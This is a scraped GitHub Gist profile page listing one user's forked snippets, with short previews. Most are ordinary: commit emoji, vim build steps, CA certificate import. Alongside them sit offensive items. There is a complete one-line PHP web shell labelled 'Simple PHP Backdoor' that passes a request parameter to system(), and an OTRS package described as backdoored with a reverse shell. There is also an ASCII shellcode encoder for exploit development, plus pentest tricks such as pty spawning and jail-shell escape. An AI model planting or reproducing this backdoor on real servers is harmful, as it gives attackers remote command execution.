Skip to content

Instantly share code, notes, and snippets.


Kevin Kirsche kkirsche

View GitHub Profile
kkirsche /
Last active Jun 17, 2021 — forked from parmentf/
Emoji for Conventional Commits
Type Emoji code
build 📦 :package:
chore 🔧 :wrench:
ci 👷 :construction_worker:
docs 📚 :books:
feat :sparkles:
fix 🐛 :bug:
perf 🚀 :rocket:
refactor 🔨 :hammer:
kkirsche /
Created Oct 2, 2018 — forked from mgeeky/
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
# This payload will at the beginning align the stack by firstly moving
kkirsche / vim8.x_with_lua
Created Jul 28, 2018 — forked from techgaun/vim8.x_with_lua
Install vim with lua support on ubuntu 16.04
View vim8.x_with_lua
I needed to install vim with lua support because I wanted to use neocomplete in my recently installed 15.04 distro. Also, this has python3 enabled by default.
Tested on 16.04 now
Update: This has been tested and verified to work on Ubuntu 16.04 as well. Also, if you wish to use particular branch/tag, you can get the version and then checkout appropriately.
The following (based upon should work though I copied it from history:
sudo apt-get remove --purge vim vim-runtime vim-gnome vim-tiny vim-common vim-gui-common
sudo apt-get build-dep vim-gnome
sudo apt-get install build-essential liblua5.3-0 liblua5.3-dev python-dev ruby-dev libperl-dev libncurses5-dev libgnome2-dev libgnomeui-dev libgtk2.0-dev libatk1.0-dev libbonoboui2-dev libcairo2-dev libx11-dev libxpm-dev libxt-dev
kkirsche / dumprequest.php
Created Mar 6, 2018 — forked from magnetikonline/dumprequest.php
PHP script to dump full HTTP request to file (method, HTTP headers and body).
View dumprequest.php
class DumpHTTPRequestToFile {
public function execute($targetFile) {
$data = sprintf(
"%s %s %s\n\nHTTP headers:\n",

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Escalate
  5. Document it

Time yourself

View Simple-Backdoor-One-Liner.php
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
kkirsche / MyPackage.opm
Created Nov 15, 2017 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
View MyPackage.opm
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Vendor>My Module</Vendor>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
kkirsche / tricks
Created Nov 10, 2017 — forked from sckalath/tricks
View tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
kkirsche / go-ssh-reverse-tunnel.go
Created Oct 25, 2017 — forked from codref/go-ssh-reverse-tunnel.go
Go SSH reverse tunnel implementation (SSH -R)
View go-ssh-reverse-tunnel.go
Go-Language implementation of an SSH Reverse Tunnel, the equivalent of below SSH command:
ssh -R 8080: operatore@
which opens a tunnel between the two endpoints and permit to exchange information on this direction:
server:8080 -----> client:8080
kkirsche / add CA cert on
Created Aug 2, 2017 — forked from kekru/add CA cert on CentOS Debian
Add CA cert to local trust store on CentOS or Debian
View add CA cert on
  • Open a webpage that uses the CA with Firefox
  • Click the lock-icon in the addressbar -> show information -> show certificate
  • the certificate viewer will open
  • click details and choose the certificate of the certificate-chain, you want to import to CentOS
  • click "Export..." and save it as .crt file
  • Copy the .crt file to /etc/pki/ca-trust/source/anchors on your CentOS machine
  • run update-ca-trust extract
  • test it with wget